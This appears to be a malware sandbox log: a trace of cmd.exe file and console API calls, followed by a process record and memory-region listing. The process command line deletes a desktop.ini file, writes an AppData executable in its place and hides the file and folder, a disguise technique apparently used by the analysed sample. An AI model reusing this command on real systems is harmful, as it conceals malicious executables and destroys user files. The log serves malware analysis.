(hFile=0x4c) returned 0x1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] GetFileType (hFile=0x4c) returned 0x1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] GetFileType (hFile=0x4c) returned 0x1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] GetFileType (hFile=0x4c) returned 0x1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] GetFileType (hFile=0x4c) returned 0x1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] GetFileType (hFile=0x4c) returned 0x1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, 
lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] GetFileType (hFile=0x4c) returned 0x1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.989] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.989] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.989] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.989] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] GetFileType (hFile=0x4c) returned 0x1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] GetFileType (hFile=0x4c) returned 0x1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] GetFileType (hFile=0x4c) returned 0x1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] GetFileType (hFile=0x4c) returned 0x1 [0144.989] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] GetFileType (hFile=0x4c) returned 0x1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] GetFileType (hFile=0x4c) returned 0x1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] GetFileType (hFile=0x4c) returned 0x1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] GetFileType (hFile=0x4c) returned 0x1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.990] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.990] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.990] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.990] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] GetFileType (hFile=0x4c) returned 0x1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] GetFileType (hFile=0x4c) returned 0x1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] GetFileType (hFile=0x4c) returned 0x1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] GetFileType (hFile=0x4c) returned 0x1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] GetFileType (hFile=0x4c) returned 0x1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, 
lpOverlapped=0x0) returned 1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] GetFileType (hFile=0x4c) returned 0x1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] GetFileType (hFile=0x4c) returned 0x1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] GetFileType (hFile=0x4c) returned 0x1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.991] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.991] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.991] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.991] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] GetFileType (hFile=0x4c) returned 0x1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] GetFileType (hFile=0x4c) returned 0x1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] WriteFile (in: hFile=0x4c, 
lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] GetFileType (hFile=0x4c) returned 0x1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] GetFileType (hFile=0x4c) returned 0x1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] GetFileType (hFile=0x4c) returned 0x1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.992] GetFileType (hFile=0x4c) returned 0x1 [0144.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] GetFileType (hFile=0x4c) returned 0x1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] GetFileType (hFile=0x4c) returned 0x1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.993] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.993] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.993] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.993] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] GetFileType (hFile=0x4c) returned 0x1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] GetFileType (hFile=0x4c) returned 0x1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] GetFileType (hFile=0x4c) returned 0x1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.993] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.993] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0144.994] GetFileType (hFile=0x4c) returned 0x1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] GetFileType (hFile=0x4c) returned 0x1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] GetFileType (hFile=0x4c) returned 0x1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] GetFileType (hFile=0x4c) returned 0x1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] GetFileType (hFile=0x4c) returned 0x1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.994] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.994] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.994] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.994] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.994] GetFileType (hFile=0x4c) returned 0x1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] GetFileType (hFile=0x4c) returned 0x1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] GetFileType (hFile=0x4c) returned 0x1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] GetFileType (hFile=0x4c) returned 0x1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] GetFileType (hFile=0x4c) returned 0x1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: 
lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] GetFileType (hFile=0x4c) returned 0x1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] GetFileType (hFile=0x4c) returned 0x1 [0144.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.995] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.996] GetFileType (hFile=0x4c) returned 0x1 [0144.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.996] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.996] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.996] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.996] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.996] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x32, lpOverlapped=0x0) returned 1 [0144.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.996] GetFileType (hFile=0x4c) returned 0x1 [0144.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.996] GetFileType (hFile=0x4c) returned 0x1 [0144.996] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0144.996] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x32, lpOverlapped=0x0) returned 1 [0144.996] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.996] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.996] _close (_FileHandle=4) returned 0 [0144.996] FindNextFileW (in: hFindFile=0x3e0e78, lpFindFileData=0x20ee7c | out: lpFindFileData=0x20ee7c) returned 0 [0144.997] GetLastError () returned 0x12 [0144.997] FindClose (in: hFindFile=0x3e0e78 | out: hFindFile=0x3e0e78) returned 1 [0144.997] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0144.998] _close (_FileHandle=3) returned 0 [0144.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.998] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0144.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.998] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0144.998] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.998] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0144.998] SetConsoleInputExeNameW () returned 0x1 [0144.999] GetConsoleOutputCP () returned 0x1b5 [0144.999] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.999] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.999] exit (_Code=0) Process: id = "197" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16de0" os_pid = "0x954" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & del /f /q 
\"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17200 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17201 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17202 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17203 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 17204 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17205 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17206 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" 
